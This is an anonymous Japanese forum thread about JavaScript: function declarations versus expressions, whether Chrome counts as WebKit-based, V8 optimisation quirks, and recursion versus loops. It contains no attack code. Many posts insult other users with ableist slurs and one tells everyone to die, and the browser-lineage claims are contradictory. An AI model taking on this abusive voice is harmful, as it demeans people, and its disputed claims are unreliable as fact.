2017/03/14(火) 01:36:17.65 ID:???
通常の関数と無名関数どちらを使用したほうが良いのでしょうか?
参考にしてきたコードでは無名関数の方が多かったように思います。後者の方がよく使われるのであれば、その理由は何ですか?
個人的には通常関数の方が関数として見やすいので好きなんですが……

通常関数 : function hoge () {...};
無名関数 : var hoge= function () {...};
805 :
2017/03/14(火) 01:39:18.00 ID:???
ChromeってBlinkになってから重くなるし独自路線に走るし普及当時あったメリットが完全に消えたよな
806 :
2017/03/14(火) 01:49:40.53 ID:???
>>803
何の証拠もなしに偽とかいうな。
そもそも、重要なのは、Blinkでテストして
WebKitでの動作保証ができるかどうかだろう。

答えはできない
807 :
2017/03/14(火) 01:53:13.17 ID:???
>>804
https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Functions_and_function_scope#Function_constructor_vs._function_declaration_vs._function_expression
この辺りを見て

>>806
blinkでのテストがwebkitでの動作保証とならないことと、blinkにwebkitのコードがもはや存在しないということは、等価ではない
証拠というなら
>Webkitのコードは削除された
この証拠をまず提示するのが筋、できないだろうけど
808 :
2017/03/14(火) 02:06:11.61 ID:???
>>807
> blinkにwebkitのコードがもはや存在しないということは

そっちは重要じゃなくて、blinkでテストしてもwebkitのテストに
ならないということのほうが重要だってーの

だからwebkitは切り捨てたって話をしてる
809 :
2017/03/14(火) 02:06:59.20 ID:???
>>807
はい、証拠w

BlinkがWebKitからフォークして1年。過去のコードの半分は削除されたと
http://www.publickey1.jp/blog/14/blinkwebkit1.html

ってかググれよ
810 :
2017/03/14(火) 02:07:12.69 ID:???
>>804
前者で成り立つプログラムなら前者でなんら問題ないよ
ただし名前空間からプロトタイプの継承とかやろうとすると後者を使わざるを得なくなるってだけ
811 :
2017/03/14(火) 02:07:13.87 ID:???
見苦しい
812 :
2017/03/14(火) 02:11:13.01 ID:???
>>808
おまえって本当にバカなんだな
同じブラウザでもバージョンが違えば厳密にはテストしたことにはならんよ
同じ元からの派生でも世代が変わればコードの中身が置き換わるのは当たり前だろう
そのことがおまえの脳内で○○ベースではない!とイコールになるのなら病院いったほうが良いぞ
813 :
2017/03/14(火) 02:13:41.46 ID:???
>>804
継承、prototype、extendあたりでぐぐってごらんよく分かるから
規模が大きいプログラム組むならこの当たりは必須で基礎中の基礎になるから今のうちに勉強しておくのも悪くない
814 :
2017/03/14(火) 02:14:04.26 ID:???
>>812
どうした? SafariはKHTMLベースって言うのはやめないのかい?
815 :
2017/03/14(火) 02:14:33.67 ID:???
「webkitのコードは削除された」
「まだ残ってますが」
「全部削除されたとは言ってねーし」

お分かりいただけるだろうか
816 :
2017/03/14(火) 02:19:10.35 ID:???
最初っから半分削除されたって書いてるよね?
都合がわるいところは見えてない?

778 自分:Name_Not_Found[sage] 投稿日:2017/03/14(火) 00:09:30.87 ID:???
Chromeの中に含まれていたWebkit由来のコードは
2014年の時点ですでに半分にまで減っている
今は殆どないだろう
817 :
2017/03/14(火) 02:19:56.48 ID:???
>>814
SafariはKHTMLベースであり、chromeはwebkitベース
単にこれが真実だよ

例の無知なアスペ君は必死にぐぐって後出し屁理屈捏ねつづけてるが
さすがchromeで動かないソース書くだけあってホームラン級のバカだな
818 :
2017/03/14(火) 02:21:59.38 ID:???
>>816
ソースなんてリファクタリングや書き直し、再構成すれば元のソースなんて無くなるの当たり前だろ
そのことが○○ベースではない!とイコールになるなら病院へGO
819 :
2017/03/14(火) 02:23:03.49 ID:???
>>817
SafariはKHTMLベース

今度からこう言おう

SafariはKHTMLベース
820 :
2017/03/14(火) 02:23:06.50 ID:???
>オープンソースなんだからgithubにでもあるだろ

>BlinkがWebKitからフォークして1年。過去のコードの半分は削除されたと
>http://www.publickey1.jp/blog/14/blinkwebkit1.html
>
>ってかググれよ

なぜgithubで確認しないのか
821 :
2017/03/14(火) 02:25:30.83 ID:???
おめでとう

【パクリ】 SafariはKHTMLベースであることが判明 [無断転載禁止]©2ch.net
http://potato.2ch.net/test/read.cgi/mac/1489425914/
822 :
2017/03/14(火) 02:25:57.46 ID:???
>>807>>810>>813
ありがとうございます
頂いたURLには答えがありませんでしたが勉強になりました
そういえば参考コードにもprototypeがあったと思います
この辺りを調べてみます
ありがとうございました
823 :
2017/03/14(火) 02:26:01.54 ID:???
>>820
git diffって知ってる?
自分で確認してくればいいよ
824 :
2017/03/14(火) 02:26:20.09 ID:???
中学生みたい
825 :
2017/03/14(火) 02:27:23.33 ID:???
ぐぐるしか能の無いゴミクズであった
826 :
2017/03/14(火) 02:27:24.98 ID:???
http://myakura.hatenablog.com/entry/2013/04/07/111238

Blinkの開発について。短期的には、Chromiumに必要ないWebKitのコードや、
Chromium以外で使われていたビルドシステム7つ(!)を削除し、
内部アーキテクチャの向上や、コードベースの単純化を行うとのこと。コ
827 :
2017/03/14(火) 02:28:51.12 ID:???
必死にぐぐってる・・・w
828 :
2017/03/14(火) 02:31:46.91 ID:???
https://en.wikipedia.org/wiki/List_of_web_browsers#Blink-based

Blink-based
Chromium
Brave
Google Chrome (based on Blink since Chrome v. 28)
Opera[24]
qutebrowser (Blink backend mostly stable)
Sleipnir
Slimjet[25]
Vivaldi



Blink-based(笑)
829 :
2017/03/14(火) 02:33:22.72 ID:???
コピーじゃなくてベースにしてるだけなんだから
フォーク元から引き継いだコードが減るのなんて当たり前だよね
問題は動作の違いを生むコード修正がどれだけあるか
830 :
2017/03/14(火) 02:35:50.67 ID:???
>>822
jsは継承やクラス実装に関しても何通りも書き方や解決法があるんだよね
どれも一長一短な部分はあるけど、classのprototypeにextendしたハッシュテーブル(メソッド名がキーで値がその実装の無名関数)を結合していくやり方が一番無難だとおもう
altjs無しで大規模開発するならこの手法しかないと個人的にはおもってる
831 :
2017/03/14(火) 02:41:06.58 ID:???
Nintendo SwitchがWebkitベースらしいな

Nintendo Switchに悪意のあるWebサイトへクセスすることで任意のコードが実行される可能性のあるWebkitの脆弱性が発見される。
http://applech2.com/archives/20170313-nintendo-switch-webkit-exploit.html


さすが脆弱性の宝庫(笑)
Webkitは危険だ。安全なBlinkベースのブラウザに置き換えよう
832 :
2017/03/14(火) 02:42:01.99 ID:???
>>829
> 問題は動作の違いを生むコード修正がどれだけあるか

1年経過した2014年の時点で、半分ぐらい削除されたらしいね。
それよりもさらに3年経過した今は元のコードはどれだけ残っているのだろうか
833 :
2017/03/14(火) 02:42:49.23 ID:???
>>832
確認しろよ
834 :
2017/03/14(火) 02:44:58.45 ID:???
2014年の時点で半分にまで減っていることは確認したよ
835 :
2017/03/14(火) 02:48:12.25 ID:???
このバカは論理がゼロなのがかわいそうだよな
何かを否定したいがために必死でぐぐって張り付けるがそれを元を否定するソースになってないことにすら気づけない
いつのまにか論点がコロコロ転がりただの粘着で終わる
836 :
2017/03/14(火) 02:51:39.32 ID:???
論点? ChromeはWebkitベースじゃないってことだけど?
だってSafariはKHTMLベースなんでしょ?
世の中にWebkitベースのものなんてないよw
837 :
2017/03/14(火) 02:58:57.54 ID:???
前スレのinnerHTMLは高速くんがまた暴れてるのか
知らないなら知らないで黙っておけば良いのに何で妄想で言い訳重ねるんだろうか
838 :
2017/03/14(火) 03:00:34.47 ID:???
また自分より下を作ろうと必死なカスがわいてるのかよ
839 :
2017/03/14(火) 03:08:34.89 ID:???
未だにChromeがWebkitベースとか言ってるやつは
Blinkのことを知らんのかって呆れた。
なんで、Webkitを切り捨てたと思ってるんだよ。
840 :
2017/03/14(火) 03:17:40.66 ID:???
>>839
主導権握りたかったからだろ
規格の統一を大義名分に鳴り物入りで参戦したくせに結局はオレオレ規格をゴリ押ししようとしてOSSから爪弾きにされた屑だし
841 :
2017/03/14(火) 03:19:10.42 ID:???
>>840
分かってないなw

Appleが自分の都合でコードを変更していたからだよ
842 :
2017/03/14(火) 03:31:26.44 ID:???
(あ、こいつOSSが何か分かってない奴だ……)
843 :
2017/03/14(火) 03:36:17.77 ID:???
Chromeはベンチ特化詐欺を辞めてくれれば最高なんだがなぁ
ベンチに最適化する余り実際の環境ではFirefoxに大きく突き放されるって何だよ
844 :
2017/03/14(火) 03:39:52.12 ID:???
あ、そのベンチ特化詐欺しらない
もしよかったら教えて欲しい
845 :
2017/03/14(火) 03:54:45.40 ID:???
お前ら死ねよ
846 :
2017/03/14(火) 03:56:13.30 ID:???
>>836
病気かな?
847 :
2017/03/14(火) 03:58:41.71 ID:???
チョコレートケーキはケーキがベースではない!
ケーキは焼き菓子がベースだからだ!


こんな感じの精神疾患なんだろうな
848 :
2017/03/14(火) 04:29:27.66 ID:???
>>844
function vec(prop){
this.x = 0;
this[prop] = 0;
}

function test(vec){
const time = performance.now();
for(let i=0; i<1000000; i++) vec.x += i;
console.log(performance.now() - time);
}

test(new vec('a'));
test(new vec('b'));
test(new vec('c'));
test(new vec('d'));
test(new vec('e'));
test(new vec('f'));

V8はこんな感じのコードを書くと最適化が死んで遅くなる
849 :
2017/03/14(火) 04:37:15.63 ID:???
>>847
そういうことだろうね。
実際にはChromeはBlinkがベースだ
850 :
2017/03/14(火) 04:43:02.12 ID:???
>>843
それぞれ最適化の手法がちがうんだからケースによって差が出るのは当たり前だろう
随分不毛な言い争いが続くとおもってたら吉火狐信者が暴れてたんだな

V8やnode.js、これらは今のweb界隈の宝だよ
いつ消滅してもだれも困らないFireFoxにしがみつくのは勝手だが質問スレ荒らすのはやめような
851 :
2017/03/14(火) 04:45:49.30 ID:???
>>849
おまえ本当に発達障害かなにかか?
ここまできても話のコアがまったく分かってないな
チョコレートケーキはケーキがベースであり、焼き菓子もベースなんだよ
どちらかを振り回してもう一方を否定してる姿が滑稽すぎるって話だよ

要するにおまえが哀れってことな
852 :
2017/03/14(火) 04:54:51.69 ID:???
>>848
申し訳ないがよく理解できない
エンジン内部でjsコードをコンパイルして実行するときに
あるオブジェクトのあるプロパティの操作とか固定のものを内部でキャッシュしたりしてて
ベンチのような特定の何かを超回数ループだとキャッシュが効くから早くなるけど
そうでなければキャッシュが効くなくなる
という感じでいいのかね
853 :
2017/03/14(火) 05:14:15.70 ID:???
>>851
何が言いたいのか全くわからん。
ベースにこだわりたいんか?

BlinkとWebkitは(2014年時点ですでに)半分以上
違うものだってのがいちばん重要な点だろ

ベースのベースのベースのベースは
ぜんぜん違うものなんだよ。
854 :
2017/03/14(火) 05:28:32.72 ID:???
> チョコレートケーキはケーキがベースであり、焼き菓子もベースなんだよ
この例えも変だし。
これはベースじゃなくて単なる包含関係
カテゴリにすぎない
855 :
2017/03/14(火) 05:33:46.18 ID:???
>>852
V8はプロパティに高速でアクセスする隠しクラスをJITに仕込んでいるんだが、
それが静的型付けを前提にしているからプロパティを付け足すだけで低速化するって話

最小構成で環境が固定されてるベンチでなら速く動くが、フレームワークやライブラリ挟んで規模を広げた実際の環境では極端に遅くなる仕様だよ
856 :
2017/03/14(火) 05:35:57.21 ID:???
>>853
webkitベースじゃん
バカなの?

釣りかとおもったが真正の吉外かよ
857 :
2017/03/14(火) 05:43:14.31 ID:???
>>855
実際に他のブラウザと比較してどの程度の速度ななるのかデータはないの?
858 :
2017/03/14(火) 05:43:25.33 ID:???
フォークとベースは違うものだよ。
ベースは日本語で基礎を意味する言葉だが
その言葉の通り、ある製品の基礎になっていれば、それはベース

あるライブラリを使用した別のライブラリは、あるライブラリをベースとしていると言っていい。
例えば、jQuery Mobileフレームワークは、jQueryをベースとしてる。

しかしフォークの場合は違う。BlinkがWebkitを含んでいるわけじゃない
BlinkそのものがWebkitと同等のもの。
だからBlinkはWebkitをフォークして作られたものであってベースとはしていない
859 :
2017/03/14(火) 05:44:26.82 ID:???
>>856
BlinkはWebkitをベースとしていない
Webkitをフォークしたものだ。
そして2014年時点で半分以上入れ替わっている。
860 :
2017/03/14(火) 05:48:49.06 ID:???
>>855
先生、念のため質問させて下さい
「膨大な量のelement.style.***へのアクセスの高速化とかで
 役立っていてベンチ最適化現象はただの波及効果」
って線はないもの?
実用性なのかベンチ特化性なのか判断できない自分

逆にそういう仕組みだと大きいオブジェクト/配列を作って
データを追加していったりするとアホ程重いとかになるのかな
prototype作って回せといわれればそれで終わりな気もするけど
861 :
2017/03/14(火) 06:12:16.50 ID:???
>>858
>>859
いい加減見苦しい
862 :
2017/03/14(火) 07:36:26.66 ID:???
ただの偏屑かよ
863 :
2017/03/14(火) 09:20:40.40 ID:???
>>861
見苦しいのはお前だよ
864 :
2017/03/14(火) 11:04:49.75 ID:???
>>857
わざわざ書いてやったんだから>>848をChromeで動かしてみろよ
865 :
2017/03/14(火) 11:16:06.12 ID:???
そもそも今のSafariはWebkit2系だからかつて言っていたWebkit系とも別物と考えたほうがいいよ。
866 :
2017/03/14(火) 11:32:29.13 ID:???
上の方で出てた無名関数とかの話ってES2015を使えるような環境だと普通にクラス構文使えるし特にメリットなさそうなんだけどどう?
867 :
2017/03/14(火) 11:37:37.97 ID:???
Wevkit切り捨てはモバイルサイト切り捨てといってるようなものだが、今時珍しい考え方だな
868 :
2017/03/14(火) 12:36:17.20 ID:???
javascriptって数ある言語のなかでも一番テクニカルで難解な言語なのに、スレに居座るのは素人丸出しの池商多いよね
869 :
2017/03/14(火) 12:36:22.77 ID:???
JavaScriptは繰り返しをループでも再帰でも書けると思いますが、
こういうときは再帰の方がいいよとか、その逆があれば教えてください
今気になってるのは条件によって途中でループを抜けたいためにforeachが
使えないような繰り返しは、単にforやwhlieでまわすより再帰の方が
すっきり書けるのかなとかそれくらいなんですが
870 :
2017/03/14(火) 13:01:20.19 ID:???
>>869
スタックの無駄遣いだろ
871 :
2017/03/14(火) 14:08:20.47 ID:???
>>867
今はBlink or Webkit2
Wevkitのシェアは0
872 :
2017/03/14(火) 14:10:10.51 ID:???
>>869
ループで纏まりきらなくなってきたら複数の関数の再帰に分割すると良いことがある
873 :
2017/03/14(火) 14:17:51.00 ID:???
>>868
理解しなくてもそれなりに使えるって事はある意味理想的なんじゃないか?
つうかJSの挙動マスター出来てたとしても、
ここで暗黙の型変換利用したトリッキーな技使います、セミコロン省略します、プロトタイプベースOOPします、とか言うと大批判間違いなしでしょ。
874 :
2017/03/14(火) 14:51:17.45 ID:???
>>869
再帰を使うぐらいなら、for,while,for-ofを使うけどね
関数を使いたいなら、Array#someを使えばいいじゃない
875 :
2017/03/14(火) 14:56:03.77 ID:???
>>874
obj = {children:[obj,obj...]}

function sendChildren(obj){
 for(let child of obj.children){
  sendChildren(child);
 }
}

こういう処理を再帰無しで書くにはどうすれば良いの?
876 :
2017/03/14(火) 14:58:40.08 ID:???
パフォーマンスの問題だろ
あんまりループをネストしたりして余りにでか過ぎる関数作ると殆ど最適化してくれ無くなるからな
反対に極めて小さな関数で有れば完全に埋め込んで最適化かけてくれる
一方再帰中に全変数で最適化のためのマイクロタイプが絶対に変化しないようにするのはちょっと大変
877 :
2017/03/14(火) 14:59:48.63 ID:???
>>875
それのどこが「条件によって途中でループを抜けたい(>869)」なの?
878 :
2017/03/14(火) 15:00:57.86 ID:???
>>875
無限ループ内で自分でスタックとか管理してオブジェクトを見渡せば出来る
879 :
2017/03/14(火) 15:08:05.81 ID:???
>>875
仮想コードにしても動くコードにしてから張り付けて貰えないもんかね
こっちに足りない部分を補完させて「それは違います」なんて言われても困るし、面倒くさい
880 :
2017/03/14(火) 15:11:00.37 ID:???
>>875
仮想コードにしても動くコードにしてから張り付けて貰えないもんかね
無駄な手間を回答者に押し付けるなといいたい
881 :
2017/03/14(火) 15:12:07.06 ID:???
投稿できてないと思って二重投稿してしまった、すまん
882 :
2017/03/14(火) 15:23:20.18 ID:???
多次元配列の一次元化アルゴリズムをここの奴らに聞いても無駄だよ

そのコード僕ちゃんのブラウザに貼り付けても動かないぞって底が知れるような文句付ける奴ばかりだから
883 :
2017/03/14(火) 15:29:28.57 ID:???
> そのコード僕ちゃんのブラウザに貼り付けても動かないぞって底が知れるような文句付ける奴ばかりだから
お前さんは>>875のコードが動くブラウザを使っているのか?
884 :
2017/03/14(火) 15:46:06.19 ID:???
>>875
element.children[0].children[0] なら [0,0,0] のように index 値を管理すれば再帰なしでも書けると思うよ
885 :
2017/03/14(火) 15:55:46.08 ID:???
>>883
抽象化されたコードくらい頭の中で実行しろよ

お前がほざいてることは数学の授業で「yって何ですか、電卓にyなんてありませんよ」と訊くくらいレベルが低いと知れ
886 :
2017/03/14(火) 16:01:37.03 ID:???
え、お前らこの程度のコードをわざわざコンソールに貼って実行してるの?
ちょっとドン引きなんですけど
887 :
2017/03/14(火) 16:08:48.47 ID:???
また自分より下を作ろうと必死なカスがわいてるのかよ
888 :
2017/03/14(火) 16:14:19.81 ID:???
>>885
>>875は無限にchildrenを参照し続けるだけで止まる気配がないんだが(多次元構造を参照したいという意思だけは伝わるがね)
このレベルの質問者にアドバイスだけで作れるわけはないが、動くようにコードを補完してやるのが面倒くさい
「アドバイスしか出てこない→質問者が分からない」という未来が透けて見えるぞ
889 :
2017/03/14(火) 16:16:34.11 ID:???
あと、まあ抽象化されたコードだkで伝わるというなら、抽象的な回答だけで質問者に伝わらないと公平でないよな
それで伝わるとは思えん質問だから解決するわけがないんだが

>>886
コンソールで実行するまでもなく動かない事は自明じゃないかね
890 :
2017/03/14(火) 16:23:01.30 ID:???
>>888
馬鹿なお前の為に書いてやったぞ

const obj = {children:[{children:[]},{children:[]}]};

function sendChildren(obj){
console.log(obj);

for(let child of obj.children){
sendChildren(child);
}
}

sendChildren(obj);

無限に参照し続けるってむしろお前がどんな補完したのか気になるわ
891 :
2017/03/14(火) 16:28:45.24 ID:???
>>890
const obj = {children:[{children:[1]},{children:[2]}]};
にして実行してみな
892 :
2017/03/14(火) 16:35:04.11 ID:???
無限に参照はいいすぎたが、「無限に参照し続けるうちに例外で止まる」が正しいな
childrenはDOM関連の仮想コードだろうから、childrenが空でないと動かないコードなど役に立たん
で、これを修正していくと>>875から大分離れたコードになる
初めから「面倒くさい」としかいってないんだが、なぜ馬鹿にされるんだろうな
893 :
2017/03/14(火) 16:38:01.49 ID:???
>>891
オブジェクト配列の入れ子なのに何で終端を数値配列にしてんの?
894 :
2017/03/14(火) 16:38:51.66 ID:???
お前らアホの相手するのやめろよ
スレのレベルが下がる
895 :
2017/03/14(火) 16:39:02.09 ID:???
傍から見てると良く分からん
childのいずれか1つにプロパティchildrenが無かったらそこでエラー吐いて止まる?
全てのchildにプロパティchildrenがあったらエラーにならず普通に終わる?
896 :
2017/03/14(火) 16:40:54.70 ID:???
>>893
オブジェクト配列しか存在しないと誰が決めたの?
897 :
2017/03/14(火) 16:42:34.88 ID:???
>>892
お前本物の馬鹿っぽいから優しく教えてやる
バグってんのはお前の補完(笑)した部分だし、普通に変数の省略部分を展開してやれば>>890の通りちゃんと動く

それとfor of文で無限とか実装的にあり得ないからよそでは言うなよ、確実に笑われるからな
898 :
2017/03/14(火) 16:42:54.76 ID:???
>>895
childのいずれか一つが「child.childrenが存在しない」もしくは「child.childrenがイテレータではない」だったら例外で止まる
899 :
2017/03/14(火) 16:44:16.77 ID:???
>>896
obj ← これが数値を示すように見える?
900 :
2017/03/14(火) 16:44:52.94 ID:???
>>898
実際イテレータじゃないと怒られた
ただ無限が良く分からん
それとオブジェクトにプロパティchildrenは確実に付随するもんなのか
901 :
2017/03/14(火) 16:45:59.78 ID:???
馬鹿にされながら「優しく」されるのは初めての経験で困惑してる
全く優しくされた気がしない
902 :
2017/03/14(火) 16:46:03.64 ID:???
>>869ですが何だかすみません
再帰はなるべく使わないようにします
903 :
2017/03/14(火) 16:46:22.04 ID:???
あ、DOM elementにchildrenがついてきてるのはなんとなくわかる
904 :
2017/03/14(火) 16:47:22.02 ID:???
>>899
そこはオブジェクトだろうけど、objの下もobjとは書かれてない
905 :
2017/03/14(火) 16:49:54.94 ID:???
>>904
再帰 ← この文字読める?意味わかってる?
906 :
2017/03/14(火) 16:55:39.55 ID:???
>>900
関数名が「sendChildren」なんだから引数に渡すオブジェクトに子要素を格納してるプロパティがあるのは必然と、一般的なプログラマなら判断する
907 :
2017/03/14(火) 16:58:07.14 ID:???
>>900
「無限に参照」は「無限に参照しようとするが、例外で止まる」というべきだった、そこはすまん
>>875を素直に読むと obj.children.children.children... のように参照し続けようとする
obj.childrenに対して「必ず」再帰処理するのだから当然だ
ところが、再帰処理する間にobjがnull,undefinedだったり、obj.childrenがイテレータではなくなるかもしれない
ここでエラーにならない方法はchildren.lengthが0である事だが、>>891が指摘するように0でなかったら破綻するわけだな
>>875は「objの中身が何か」を明確に表してないので俺は「objの中身が何であっても例外なく処理できるようにする事」を考えるが、どんな前提があるのか分からんのに例外処理を書いてやるのが面倒くさい
(意訳: 条件次第では例外処理をさぼれるから前提条件をもっとちゃんと書け。最低限、動くコードを書け。)
908 :
2017/03/14(火) 17:05:20.69 ID:???
>>900
> それとオブジェクトにプロパティchildrenは確実に付随するもんなのか
{} の場合は明示的に children を初期化しなければ存在しない
909 :
2017/03/14(火) 17:06:23.07 ID:???
>>907
まあ>>905-906が全てだな
単にお前がコードも読めない無能なだけ
910 :
2017/03/14(火) 17:08:21.12 ID:???
>>906-908
解説サンキュー
つまるところ何のobjかわからない、限定されてない、性質上必ずchildrenを持つobjとは判断できない、
そんでもって通常var o = {};してもo.childrenが絶対ついてくるってわけじゃないんだよな
安心した

再帰ってこういう前提問題があるから毎回説明コメントをがっつり入れざるを得ないのがめんどい
911 :
2017/03/14(火) 17:11:33.17 ID:???
何この分かりやすい自作自演擁護
912 :
2017/03/14(火) 17:12:01.14 ID:???
>>905
当然、知ってる
再帰処理がフォーマットを決定づけるものではないから、知ってても意味ないけどね
913 :
2017/03/14(火) 17:15:19.80 ID:???
というか、なんで for( let child of obj.children ) なん?
構造確定しててこういう再帰だったらchildrenはobjectじゃなくて配列のほうが良くない?
914 :
2017/03/14(火) 17:17:30.77 ID:???
普通に配列でもOKで普通に配列だったすまん
915 :
2017/03/14(火) 17:18:30.83 ID:???
関数は引数のフォーマットを決定付けるものではない(キリッ

また物凄い屁理屈が出たな
言い訳の度にボロが出るんだから黙れば良いのに
916 :
2017/03/14(火) 17:19:29.95 ID:???
確かに。構造確定しているなら多次元配列の方がスマートだよなあ。
ところで、>>890はただの空配列しかできないから構造として全く意味を無さないと思う。
917 :
2017/03/14(火) 17:20:37.66 ID:???
いや、「再帰=フォーマット確定」は思い込みが激しいだけの人だと思うぞ
918 :
2017/03/14(火) 17:26:16.85 ID:???
>>917
関数に渡される引数には役割通りの型が求められるってコーディング規約以前にプログラミングの常識だと思うが
919 :
2017/03/14(火) 17:27:46.21 ID:???
>>917
思い込みの激しいカス
大学ならFラン
920 :
2017/03/14(火) 17:29:50.55 ID:???
常識を言うなら、再帰関数で与えられた引数そのものを再帰的に処理するときは
引数のチェックから始めるのが筋では
921 :
2017/03/14(火) 17:34:30.22 ID:???
あと必要に応じて無限ループに陥らないよう処理回数や世代数の上限を定めるとかかな

こういうのこなすのは前提として、楽に繰り返し構文で書けるなら再帰を使わない
あとループで簡単にこなせるとしても汎用性があるなら再帰を使う、って感じ
922 :
2017/03/14(火) 17:38:27.02 ID:???
引数のチェックは再帰以前に一般的な関数を書くときの常識だと思ってた
923 :
2017/03/14(火) 17:41:10.40 ID:???
>>920
なら聞いてやるが引数の型が想定と違った場合はどう処理すんの?

例外吐いて止める以外の答えを出したらお前は致命的なミスやらかす前にプログラマを辞めるべきだし、
例外吐いて止めると言うならそもそも型チェック自体がいらねえってことにも気付かないカスと認めることになるが
924 :
2017/03/14(火) 18:02:41.56 ID:???
>>923
そんなもん仕様・再帰関数の中の実処理によるだろ
値を返していかないならすぐさまreturnするのもありなケースもある
例外投げるにしても想定できてるなら自前でわかりやすい例外オブジェクト作って投げれ
関数書いた奴以外が関数使って例外もらったときに気を使え

そもそも例外前提なら例外掴むコード書けよ
925 :
2017/03/14(火) 18:11:08.56 ID:???
馬鹿には何を言っても無駄
926 :
2017/03/14(火) 18:14:39.86 ID:???
ほんの数時間前に「コードが動かない」って喚いてた事実が、全ての言い訳から説得力を奪ってるからなぁ
927 :
2017/03/14(火) 18:16:01.18 ID:???
煽って技術引き出してくスタイルなんだろ
928 :
2017/03/14(火) 18:21:38.84 ID:???
まだ続けるのか池沼
929 :
2017/03/14(火) 18:55:05.71 ID:???
再現可能なコードを出した方がいいのは言うまでもないが、ここで煽っている人とやりあっても仕方ないという事だな
真面目に回答している人が哀れになってくる
930 :
2017/03/14(火) 19:13:54.98 ID:???
俺は半年くらい前から真面目に回答するのをやめたわ
複数の回答サイトを使っていればすぐ分かると思うが、このスレの環境は劣悪すぎる
931 :
2017/03/14(火) 19:19:59.15 ID:???
幻滅しましたteratailに行きます
932 :
2017/03/15(水) 00:53:10.33 ID:???
>>930
複数の回答サイトを使っていればすぐわかると思うが、
正しい回答が含まれる確率はこのスレがずば抜けて上だよ
一方碌でもない回答が付く可能性もずば抜けて上
でも個人的には50%の確率で堂々と間違った回答がベストアンサーになってしまう
外の世界は大嫌いだから主にここに閉じこもってる
向こうはそれこそJS知らないのにググってきた情報から回答する奴も沢山いるからな
933 :
2017/03/15(水) 00:57:09.50 ID:???
質問サイトは「分かりません」と回答する奴が半数で、質問者に謎の逆ギレしてる奴が半数という魔境だしな
934 :
2017/03/15(水) 02:32:18.10 ID:???
知らないのにググって回答書くというのはどうなんだろうか
935 :
2017/03/15(水) 02:49:30.67 ID:???
>>934
URL引っ張ってくる
でもよく似た別のものだったりする事が多々ある
プログラミングだと同じ字面でも違うものもあるしな
936 :
2017/03/15(水) 15:49:04.09 ID:???
>>932は全部2chでもよくあることだけどねえ
937 :
2017/03/15(水) 17:02:57.26 ID:???
>>936
2chは天邪鬼やプライド高いやつが集まってるから
一通りの見方が公平に集まって良い
938 :
2017/03/15(水) 17:06:59.20 ID:???
天邪鬼やプライド高いやつが集まってるなら公平な見方になるわけないのだが
939 :
2017/03/15(水) 17:11:59.41 ID:???
>>938
いろんな視点から意見が出揃うことが何より大事
初心者にとってもそういったのを眺め続けて、
とにかく玉石混交の情報を沢山自分の中にためていって
自分なりの答えを固めていくのが一番良い

ただそれっぽい回答で即締め切りの外部サイトはよりマシ
940 :
2017/03/15(水) 17:40:28.05 ID:???
>>939
そういう意味ではなく、天邪鬼やプライド高いやつしかいない場ではgdgdな回答しか集まらないという事
初心者はそういういろんな意見が集まった中から正しい回答を選び取る観察眼を持ってないからそういう意見がある事はメリットにならない
941 :
2017/03/15(水) 17:44:54.67 ID:???
そもそも、>>930は「回答者にとって劣悪すぎるから2chで回答を止めた」といっているのに対して>>932は回答の質がどうたらこうたらと頓珍漢な方向に反論してるのがな
回答者にとっての場としてみるなら「stackoverflow >> teratail >>>> 超えられない壁 >>>> 2ch」だろうな
942 :
2017/03/15(水) 17:50:15.12 ID:???
知恵袋も入れてあげて!
943 :
2017/03/15(水) 17:50:39.43 ID:???
よくわからんが最終的に役立つ回答があればOKなんでしょ
944 :
2017/03/15(水) 17:52:54.71 ID:???
そういえば、以前に「2chは煽って煽って煽りまくればプライドが高い人が回答をくれるいいところだ」と主張している奴がいたなあ
質問して回答が来ればなんでもいいという質問者本位な考え方
945 :
2017/03/15(水) 17:58:31.77 ID:???
それ自体が負け惜しみだったりして
946 :
2017/03/15(水) 18:00:32.48 ID:???
他所でよく見るgoogleの検索結果しか載せないって回答は全く自分で調べる気がない質問者にはよく見るけど、大抵的外れでもないんだよね
でも、質問者はそれでは分からないから質問を繰り返して最終的に回答者がコピペできるコードを乗っけてくれるまで粘る
こういう自分で調べる気が全くない他人におんぶな質問者を擁護する人って自分の事しか考えてないんだろうなあ
947 :
2017/03/15(水) 20:48:59.47 ID:???
>>940
正しい回答を選び取る必要はないよ
情報を自分の中に貯めることが大切だから
こういうのもあったな、ああいうのもあったなというのが一番初心者にとって役に立つ
何かを理解するためには別の何かを知っていないと行けないというジレンマがあるが
これを解決するには極めて体型だった学習か、
それがないプログラミング界では一定の閾値まで情報を貯めるということになる
948 :
2017/03/15(水) 20:55:12.12 ID:???
またわいてるのかよ
いい加減にしろよ
949 :
2017/03/15(水) 21:01:09.39 ID:???
>>947
「間違っているかもしれない情報を自分の中に貯める事に意味がある」とそういいたいわけか
正当性を主張するにしても苦しすぎるぞ
950 :
2017/03/15(水) 21:22:53.71 ID:???
>>942
「stackoverflow >> teratail >> OKWave, 教えてgoo >> Yahoo知恵袋 >>>> 超えられない壁 >>>> 2ch」
どんな理由を並べ立てたところで「回答者が2chにいる理由」はほぼないだろうな
擁護している人も「質問者にとっての2chのメリット」にすり替えて主張してる事だしな(その論もボロボロだが)
951 :
2017/03/15(水) 21:29:55.19 ID:???
2chなら適当な回答をしても匿名だからへっちゃらというのはある
他のサイトだと一応ユーザー名は表示されるもんだから、あんまり適当にホイホイ答えられない

あとは2chは単にストレス発散にいい
952 :
2017/03/15(水) 22:07:11.98 ID:???
そういう負の感情をまき散らす人が増えるから、まともな回答者がいなくなるわけだな
953 :
2017/03/15(水) 22:21:10.65 ID:???
無責任に回答して、ストレス発散に使われる質問スレって質問者にとってもいい事ないんじゃ…
954 :
2017/03/15(水) 22:25:16.02 ID:???
負のスパイラルやな(´・ω・`)
955 :
2017/03/16(木) 02:06:48.67 ID:???
2ch以外では、名前も分かるから、うかつに書き込めない

2chなら間違えたことを書いても、それをヒントに誰かが修正するから、
そこで取捨選択・競争が起こり、より良いものができる
956 :
2017/03/16(木) 02:15:54.92 ID:???
迂闊に書き込めないより迂闊に書き込める方が本来は理想的だと思うよ。
でもそもそも同じように混沌としてるWebから情報を見つけてこれないような初心者にとって優しいとは思えないね。
中級者が深い疑問をぶつけて議論するには良いんじゃないの?
957 :
2017/03/16(木) 02:31:23.91 ID:???
結局問題は、バカがバカなこと書き込んでもそれを認めず延々と屁理屈垂れ続けれる事なんだよね
要するに審判が居ないから永遠に負けないんだよ(彼の中では)
これが荒れる原因
